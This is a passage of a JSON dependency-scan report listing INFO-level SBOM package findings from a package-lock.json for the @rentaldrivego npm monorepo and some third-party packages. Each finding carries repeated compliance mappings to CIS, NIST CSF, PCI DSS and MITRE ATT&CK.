"IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5e204c38947c3756", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/dashboard 1.0.0", "title": "@rentaldrivego/dashboard 1.0.0", "description": "Package discovered: @rentaldrivego/dashboard 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fb550e5d7052cd7e", "name": "@rentaldrivego/dashboard", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/dashboard:\\@rentaldrivego\\/dashboard:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/dashboard@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "", "integrity": "", "dependencies": { "@rentaldrivego/types": "*", "autoprefixer": "^10.4.19", "dayjs": "^1.11.11", "lucide-react": "^0.376.0", "next": "14.2.3", "postcss": "^8.4.38", "react": "^18.3.1", "react-dom": "^18.3.1", "recharts": "^2.12.7", "sharp": "^0.34.5", "socket.io-client": "^4.7.5", "tailwindcss": "^3.4.3", "zod": "^3.23.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f5ec61dae5249a19", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/dashboard UNKNOWN", "title": "@rentaldrivego/dashboard UNKNOWN", "description": "Package discovered: @rentaldrivego/dashboard UNKNOWN", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8302af283dd2fb59", "name": "@rentaldrivego/dashboard", "version": "UNKNOWN", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/dashboard:\\@rentaldrivego\\/dashboard:*:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/dashboard", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "apps/dashboard", "integrity": "", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "71d8c650760061fb", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/database 1.0.0", "title": "@rentaldrivego/database 1.0.0", "description": "Package discovered: @rentaldrivego/database 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bd8906fc40f841ac", "name": "@rentaldrivego/database", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/database:\\@rentaldrivego\\/database:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/database@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "", "integrity": "", "dependencies": { "@prisma/client": "^5.13.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8b90575e8ea88bd4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/database UNKNOWN", "title": "@rentaldrivego/database UNKNOWN", "description": "Package discovered: @rentaldrivego/database UNKNOWN", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2bdca263d566c09a", "name": "@rentaldrivego/database", "version": "UNKNOWN", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/database:\\@rentaldrivego\\/database:*:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/database", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "packages/database", "integrity": "", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8a8bb5bfb12506b1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/marketplace 1.0.0", "title": "@rentaldrivego/marketplace 1.0.0", "description": "Package discovered: @rentaldrivego/marketplace 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "71e9d3c366707710", "name": "@rentaldrivego/marketplace", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/marketplace:\\@rentaldrivego\\/marketplace:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/marketplace@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "", "integrity": "", "dependencies": { "@rentaldrivego/types": "*", "autoprefixer": "^10.4.19", "dayjs": "^1.11.11", "lucide-react": "^0.376.0", "next": "14.2.3", "postcss": "^8.4.38", "react": "^18.3.1", "react-dom": "^18.3.1", "tailwindcss": "^3.4.3", "zod": "^3.23.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f48ad70ae4557b5a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/marketplace UNKNOWN", "title": "@rentaldrivego/marketplace UNKNOWN", "description": "Package discovered: @rentaldrivego/marketplace UNKNOWN", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "999e66650845f9f4", "name": "@rentaldrivego/marketplace", "version": "UNKNOWN", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/marketplace:\\@rentaldrivego\\/marketplace:*:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/marketplace", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "apps/marketplace", "integrity": "", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "93a5bccb6ac6aa22", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/public-site 1.0.0", "title": "@rentaldrivego/public-site 1.0.0", "description": "Package discovered: @rentaldrivego/public-site 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f54f88caa8e97b5c", "name": "@rentaldrivego/public-site", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public-site:\\@rentaldrivego\\/public-site:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public-site:\\@rentaldrivego\\/public_site:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public_site:\\@rentaldrivego\\/public-site:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public_site:\\@rentaldrivego\\/public_site:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public:\\@rentaldrivego\\/public-site:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public:\\@rentaldrivego\\/public_site:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/public-site@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "", "integrity": "", "dependencies": { "@rentaldrivego/types": "*", "autoprefixer": "^10.4.19", "dayjs": "^1.11.11", "lucide-react": "^0.376.0", "next": "14.2.3", "postcss": "^8.4.38", "react": "^18.3.1", "react-dom": "^18.3.1", "tailwindcss": "^3.4.3", "zod": "^3.23.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "308a85ace6addbbf", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/types 1.0.0", "title": "@rentaldrivego/types 1.0.0", "description": "Package discovered: @rentaldrivego/types 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ba9eab15fb9d9b6f", "name": "@rentaldrivego/types", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/types:\\@rentaldrivego\\/types:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/types@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "", "integrity": "", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7f447d2356272ad6", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/types UNKNOWN", "title": "@rentaldrivego/types UNKNOWN", "description": "Package discovered: @rentaldrivego/types UNKNOWN", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f26df386702211f3", "name": "@rentaldrivego/types", "version": "UNKNOWN", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/types:\\@rentaldrivego\\/types:*:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/types", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "packages/types", "integrity": "", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4b6c5d98db4a925c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @selderee/plugin-htmlparser2 0.11.0", "title": "@selderee/plugin-htmlparser2 0.11.0", "description": "Package discovered: @selderee/plugin-htmlparser2 0.11.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "264d7bf353437253", "name": "@selderee/plugin-htmlparser2", "version": "0.11.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@selderee\\/plugin-htmlparser2:\\@selderee\\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@selderee\\/plugin-htmlparser2:\\@selderee\\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@selderee\\/plugin_htmlparser2:\\@selderee\\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@selderee\\/plugin_htmlparser2:\\@selderee\\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@selderee\\/plugin:\\@selderee\\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@selderee\\/plugin:\\@selderee\\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40selderee/plugin-htmlparser2@0.11.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@selderee/plugin-htmlparser2/-/plugin-htmlparser2-0.11.0.tgz", "integrity": "sha512-P33hHGdldxGabLFjPPpaTxVolMrzrcegejx+0GxjrIb9Zv48D8yAIA/QTDR2dFl7Uz7urX8aX6+5bCZslr+gWQ==", "dependencies": { "domhandler": "^5.0.3", "selderee": "^0.11.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "96b2d8a0d3d3dca0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @socket.io/component-emitter 3.1.2", "title": "@socket.io/component-emitter 3.1.2", "description": "Package discovered: @socket.io/component-emitter 3.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ 